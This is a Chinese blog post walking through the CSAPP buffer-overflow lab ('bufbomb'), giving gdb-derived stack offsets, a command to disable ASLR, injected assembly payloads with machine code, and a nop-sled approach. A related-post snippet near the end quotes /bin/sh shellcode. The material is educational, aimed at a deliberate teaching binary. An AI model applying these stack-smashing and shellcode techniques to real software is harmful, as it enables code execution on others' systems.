Buffer Overflow: 堆栈溢出攻击实验

最新推荐文章于 2024-04-24 15:09:25 发布
最新推荐文章于 2024-04-24 15:09:25 发布
阅读量721 收藏 2
点赞数
文章标签: 操作系统
原文链接:https://segmentfault.com/a/1190000008355666
版权

前言

这是CSAPP官网上的著名实验,通过注入汇编代码实现堆栈溢出攻击。
实验材料可到我的github仓库 https://github.com/Cheukyin/C... 下载

linux默认开启ASLR,每次加载程序,变量地址都会不一样,所以若要关闭ASLR:
sysctl -w kernel.randomize_va_space=0(赋值为2,即可打开ASLR

不过本实验的程序似乎经过特殊处理,不需要关闭ASLR

正常编译的程序的stacknon-executable的,但是加一个编译选项就可以打开
本实验的程序应该都打开了executable选项了

Level0

修改getbuf()的返回地址,让程序执行smoke
打开gdb,设置断点至getbuf, r -u cheukyin

80491f4:    55                       push   %ebp
80491f5:    89 e5                    mov    %esp,%ebp
80491f7:    83 ec 38                 sub    $0x38,%esp
80491fa:    8d 45 d8                 lea    -0x28(%ebp),%eax
80491fd:    89 04 24                 mov    %eax,(%esp)
8049200:    e8 f5 fa ff ff           call   8048cfa <Gets>
8049205:    b8 01 00 00 00           mov    $0x1,%eax
804920a:    c9                       leave  
804920b:    c3                       ret

以上代码标明buf的地址是ebp-0x28,地址存放在eax
print $ebp+4 ==> 0x55683884
print eax ==> 0x55683858
两者相差44个字节,因此需要输入44个普通字符,在输入smoke的地址
print smoke ==> 0x8048c18

hex结果保存在level0-smoke-hex.txt
./hex2raw < level0-smoke-hex.txt|./bufbomb_32 -u cheukyin 即可过关

Level1

跟上面类似,执行fizz(),不过fizz有一个参数需要压栈,这个参数需要跟cookie相等
因此除了修改getbuf返回地址,还需要输入四字节当作fizz的返回地址,再输入4字节cookie

./makecookie cheukyin 可获取cookie
反汇编可获取fizz返回地址

./hex2raw<level1-fizz-hex.txt | ./bufbomb_32 -u cheukyin 通关

Level2

修改全局变量global_value的值,并进入ban函数

要修改global_value,便需在stack上注入一段修改的代码,执行完get_bufjump到该代码,
代码执行完后便jumpbang

level2-firecracker-assembly.S为注入代码:

# push the address of bang onto stack
pushl $0x08048c9d

# in gdb, print &global_value  ==>   0x804d100
# mov cheukyin cookie to global_value
mov $0x3955ae84, %eax
mov %eax, 0x804d100

# jump to <bang>
ret

先把bang地址压栈,然后修改global_value的值为cheukincookie,最后ret跳转至bang

gcc -m32 -c level2-firecracker-assembly.S生成目标文件
objdump -d level2-firecracker-assembly.o > level2-firecracker-assembly.d反汇编
level2-firecracker-assembly.d:

0:    68 9d 8c 04 08           push   $0x8048c9d
5:    b8 84 ae 55 39           mov    $0x3955ae84,%eax
a:    a3 00 d1 04 08           mov    %eax,0x804d100
f:    c3                       ret

gdb: print $ebp+8 ==> 0x55683888
把机器码填充到上面的地址,然后把get_buf返回地址修改为上面的地址即可

./hex2raw<level2-bang-hex.txt | ./bufbomb_32 -u cheukyin可过关

Level3

getbuf返回cookietest,因此不能破坏teststack frame,
所以只能把注入代码写在输入字符串的开头,也就是buf地址

另外,当返回test时需要恢复正确的ebp,因此输入字符串中在返回地址之前应写入ebp:
getbuf中, x/wx $ebp ==> 0x55683880
返回地址应是buf地址: print $ebp-0x28 ==> 0x55683858

注入代码需要把cookie移入eax,并返回正确的地址:

#in getbuf: x/wx $ebp+4 ==> 0x08048dbe
#push get_buf's return address
pushl $0x08048dbe

#return cheukyin's cookie to test
movl $0x3955ae84, %eax

#return to <test>
ret

gcc -m32 -c level3-Dynamite-assembly.S
objdump -d level3-Dynamite-assembly.o > level3-Dynamite-assembly.d
把生成的机器码填入buf

./hex2raw<level3-Dynamite-hex.txt | ./bufbomb_32 -u cheukyin通关

Level4

最后一关的要求和上一关一致,不过需要加上-n参数运行bufbomb
此时会进入testngetbufn函数而不是testgetbuf函数。
与之前不同在于,为模拟真实环境具有不定数量环境变量在stack frame的上方,
进入getbufn时的ebp值不是固定值,
读取字符串缓冲区大小由32变为512,而且会调用testn函数五次,
意味着需要输入五次字符串并全部通过才能通过。

由于testn()ebp值不固定,首先需要确定如何恢复该值。
需要注意到一个事实,espebp距离是固定的.
testn的汇编代码:

8048e26:    55                       push   %ebp
8048e27:    89 e5                    mov    %esp,%ebp
8048e29:    53                       push   %ebx
8048e2a:    83 ec 24                 sub    $0x24,%esp
8048e2d:    e8 5e ff ff ff           call   8048d90 <uniqueval>
8048e32:    89 45 f4                 mov    %eax,-0xc(%ebp)
8048e35:    e8 d2 03 00 00           call   804920c <getbufn>
8048e3a:    89 c3                    mov    %eax,%ebx

getbufn正常返回后应回到8048e3a,此时ebp=esp+0x28
因此注入代码应增加利用esp恢复ebp的语句
如下:

#testn's ebp is fixed
#read <testn>'s assembly code and calculate
lea 0x28(%esp), %ebp

#look into bufbomb_32.S
#push getbufn's return address
pushl $0x08048e3a

#return cheukyin's cookie to test
movl $0x3955ae84, %eax

#return to <testn>
ret

查看其机器码:

0:    8d 6c 24 28              lea    0x28(%esp),%ebp
4:    68 3a 8e 04 08           push   $0x8048e3a
9:    b8 84 ae 55 39           mov    $0x3955ae84,%eax
e:    c3                       ret

此时,还有另一个难题,ebp不固定,则getbufn中的字串数组buf地址也是不固定的.
如何修改getbufn返回地址来执行注入代码呢?

通过gdb查看读入getbufn内字符串buf的地址(即eax),
对于同样的userid会给出一样的地址序列,
目测是以useridseed的伪随机,五次运行给出的地址分别为:

0x55683678
0x55683698
0x556836c8
0x556835f8
0x55683668

根据提示采用nop sleds的技术,
大意是:在不清楚有效机器代码的入口地址时,
可以在有效机器代码前以大量的nop机器指令(0x90)填充,
只要跳转地址处于这些nop上就能到达有效机器代码。
由于栈上的机器代码是按地址由低向高顺序执行,
要保证五次运行都能顺利执行有效机器代码,
需要满足:跳转地址位于有效机器代码入口地址之前的nop机器指令填充区。
这要求尽可能增大nop填充区,尽可能使有效机器代码段往后挪。

因此返回地址选用最高的地址: 0x556836c8

getbufn汇编代码

8049215:    8d 85 f8 fd ff ff        lea    -0x208(%ebp),%eax

可知buf地址和存放返回地址的单元相隔 0x208+4 = 0x20c 个字节

而注入代码共15个字节,因此共需要在buf开头填充 0x20c-15nop(0x90)
然后在填入机器码和返回地址

./hex2raw -n <level4-Nitroglycerin-hex.txt|./bufbomb_32 -u cheukyin -n 通关
./hex2raw-n 选项可让hex2raw重复多次输入

weixin_34372728
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Lab1-Buffer OverFlow
11-10
Lab1-Buffer OverFlow,包含代码、实验说明和论文。
栈溢出漏洞及栈溢出攻击
热门推荐
guilanl的专栏
03-13 1万+
1. 栈溢出的原因 栈溢出(stack-based buffer overflows)算是安全界常见的漏洞。一方面因为程序员的疏忽,使用了 strcpy、sprintf 等不安全的函数,增加了栈溢出漏洞的可能。另一方面,因为栈上保存了函数的返回地址等信息,因此如果攻击者能任意覆盖栈上的数据,通常情况下就意味着他能修改程序的执行流程,从而造成更大的破坏。这种攻击方法就是栈溢出攻击(stack
Buffer_Overflow:是浏览器的简单缓冲区溢出吗
05-15
ZH-CN此脚本包含一个重复循环,该循环使一个递归重定向计数器生成大量执行项,从而导致缓冲区溢出。 PT-BR:此脚本包含一个重复循环,该循环使一个递归重定向计数器生成大量执行项,从而导致缓冲区溢出。 概念证明:
buffer-intro:堆栈缓冲区溢出简介
06-12
堆栈缓冲区溢出 去做 为 64 位二进制添加构建 记录 32 位的演练 记录 64 位演练 显示堆栈和内存布局 概述 这是一个简单的堆栈缓冲区溢出演示。 编译器中已明确禁用保护。 这项工作的大部分是对的重新实现 进一步阅读 演练 目标 执行cold_code()和very_cold_code() 。 为什么? 好吧, cold_code()和very_cold_code()存在于源文件中,但是main()没有调用它们,使它们无法访问。 能够控制内存使我们能够随机跳转到这些功能 设置 满足您的构建依赖项。 我们正在编译到 x86,所以我们需要有 32 位库 很多人将运行 x64,因此您可能需要寻找类似于lib32gcc1软件包 通过运行./build构建overflow 可选-编辑~/.gdbinit允许回购的装载.gdbinit与add-auto-load-safe-pat
堆栈溢出调试方法合集
07-19
栈溢出获取shell 用gdb调试缓冲区溢出 初尝Linux栈溢出 用gdb调试缓冲区溢出 栈的观察
栈溢出的简单实验
weixin_43894468的博客
09-17 1289
实验用到first和first.c文件,first中的代码如下,可以看到用于攻击的wuwu()函数是永远不会被调用执行的;但是gets()是一直读取输入的字符直到读取\n才停止,由于gets()没有读取长度的限制,可以通过读取超出规定长度的字符来修改栈帧中的返回地址,从而达到攻击目的; 右键first,使用IDA打开,打开之后可以看到是这样的汇编指令,按Tab键可以看地址,空格可以看反编译代码; main()函数 wuwu()函数 进入运行vbox虚拟机,打开虚拟机后先挂载共享文件夹,挂载后才能使用共
探索技术新星:Buffer_Overflow — 漏洞利用与防护实践
gitblog_00081的博客
04-20 309
探索技术新星:Buffer_Overflow — 漏洞利用与防护实践 项目地址:https://gitcode.com/gh0x0st/Buffer_Overflow 在网络安全的世界里,Buffer Overflow是一个著名的漏洞,它允许恶意攻击者超越程序原本的控制流,执行任意代码。Buffer_Overflow 是一个由开发者 gh0x0st 创建的开源项目,旨在帮助学习和理解这种漏洞的本质...
【软件与系统安全】上机作业practice1-栈溢出利用的分析
Wking
04-25 423
软件与系统安全上机作业——栈溢出利用的分析
C/C++内存检测工具Sanitizers
UUUUTaossienUUUU的专栏
02-09 2218
Sanitizers
【C语言刷LeetCode】Address Sanitizer 常见报错
kinbo88的专栏
03-01 1万+
LeetCode使用 AddressSanitizer 检查内存是否存在非法访问,报此错,主要是访问了非法内容。 Address Sanitizer(ASan)是google开发一个快速的内存错误检测工具,性能据说比valgrind要好不少,可以配合clang或者GCC编译器使用,GCC需要4.8及以上版本。 详细了解AddressSanitizer信息可以访问其github项目地址:http...
Buffer-Overflow:一个简单的缓冲区溢出攻击来破解一个用 C 编写的天真的错误登录程序的简单说明
07-01
缓冲区溢出 缓冲区溢出攻击的简单说明,用于破解一个用 C 编写的幼稚的错误登录程序,并使用 shell 代码生成一个交互式 shell。 攻击方法 下面一段汇编代码用作shellcode: Needle0: jmp here: pop %rdi xor %rax, %rax movb $0x3b, %al xor %rsi, %rsi xor %rdx, %rdx 系统调用那里: call here .string "/bin/sh"needle1: .octa 0x死牛肉 在上面的汇编代码中,字符串“/bin/sh”放在调用之后,以便在调用后将其压入堆栈。 然后将其弹出到 rdi 上。 经过一些工作,最终调用中断,并使用“execv”系统调用或“0x3b 系统调用号”将外壳加载到内存中。 参考: : 这个 shell 代码的对象转储被获取并在程序中适当地溢出,如下所述。 缓冲
Buffer Overflow Attacks(缓冲溢出攻击)
10-31
相当全面权威的一本专业教材, 书名: Buffer Overflow Attacks D E T E C T, E X P L O I T, P R E V E N T
计算机安全_Lab 2:Buffer Overflow Vulnerability .pdf
06-04
缓冲区溢出定义为程序尝试将数据写入超出预分配的固定长度缓冲区边界的条件。恶意用户可以利用此漏洞来改变程序的流控制,甚至可以执行任意代码。此漏洞由于数据存储(例如缓冲区)和控制存储(例如返回地址)的混合而产生:数据部分中的溢出会影响程序的控制流,因为溢出可能会更改返回地址。在本实验中,我们将获得一个缓冲区溢出漏洞的程序,开发一个利用漏洞的方案,最终获得 root 权限
Buffer-Overflows:缓冲区溢出漏洞利用介绍
06-18
缓冲区溢出简介 作为我大学计算机安全课程的第一个项目,我的任务是在三个不同的简单程序上查找和利用缓冲区溢出漏洞。 先决条件 在深入研究缓冲区溢出之前,您应该熟悉: 基本的 C/C++ 理解。 Linux 权限。 基本装配知识。 GDB 和程序内存分配(堆栈、帧)。 GNU 项目调试器(又名 GDB)特别有用,因为我不会详细介绍如何使用它,如果您不熟悉,请查看文档或任何好的教程。 对本项目有用的部分有:反汇编程序,检查变量内容,打印saved return address等帧信息。 现在您可以开始阅读有关缓冲区溢出的。 场景 同一台 Linux 机器上还有其他三个用户,因此 /home 目录如下所示: jason@linux /home $ ls hyperuser jason masteruser superuser 每个用户(超级用户、超级用户、主用户)在他们的主目录中都
buffer_overflow:缓冲区溢出
05-31
发生在堆数据区的缓冲区溢出被称为堆溢出,其利用方式与基于堆栈的溢出不同。 堆上的内存由应用程序在运行时动态分配,通常包含程序数据。 漏洞利用是通过以特定方式破坏此数据以导致应用程序覆盖内部结构(例如链表...
Go下载安装及切换不同版本的方法
tangPHP的博客
04-18 1008
GVM(与Ruby中的RVM一样)最初是由Josh Bussdieker开发的,它允许为每个项目或项目组创建开发环境,分离不同的Go版本和包依赖关系,以提供更大的灵活性并防止版本问题。go install 命令会把go1.22.1版本作为1.22.2的可执行安装包,存放在 ~/go/bin下面。已经安装go的情况下(例如当前版本为:1.22.2),可以通过go install 来安装其他版本。切换到指定的包集后,后续使用go build、go run命令时会把下载的包安装到包集目录。
linux查看一个目录下每个文件夹的大小
Debug yourself!
04-19 433
这会列出指定目录下每个文件夹的大小,并以人类可读的格式(例如,KB,MB,GB)显示。要查看一个目录下每个文件夹的大小,你可以使用。替换为你要查看的目录的实际路径。命令(disk usage)。
服务器中查看CPU/GPU使用情况的常用命令
qq_45734745的博客
04-18 249
Ctrl+C退出 参考博文:https://mbd.baidu.com/ug_share/mbox/4a83aa9e65/share?product=smartapp&tk=6ff15196d305c4dd3daab94b4abb81a4&share_url=https%3A%2F%2Fyebd1h.smartapps.cn%2Fpages%2Fblog%2Findex%3FblogId%3D131555148%26_swebfr%3D1%26_swebFromHost%3Dbaiduboxapp&doma
linux的“>”和“>>”
最新发布
qq_45212655的博客
04-24 264
文件存在,新的输出将被添加到文件的内容之后;如果文件不存在,将会创建一个新文件。文件存在,它的内容将被新的输出覆盖;如果文件不存在,将会创建一个新文件。都是用于文件重定向的操作符,它们用于将命令的输出发送到文件中。用于创建一个新文件或覆盖现有文件的内容。用于将输出附加到现有文件的末尾,而不是覆盖它。
audioflinger: recordthread: buffer overflow
01-13
当出现"buffer overflow"时,意味着录音操作的缓冲区溢出。 这种情况通常发生在录音操作的缓冲区大小不足以存储即将要录入的音频数据时。这可能是由于录音数据产生的速度大于处理数据的速度,或者是由于录音缓冲区...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值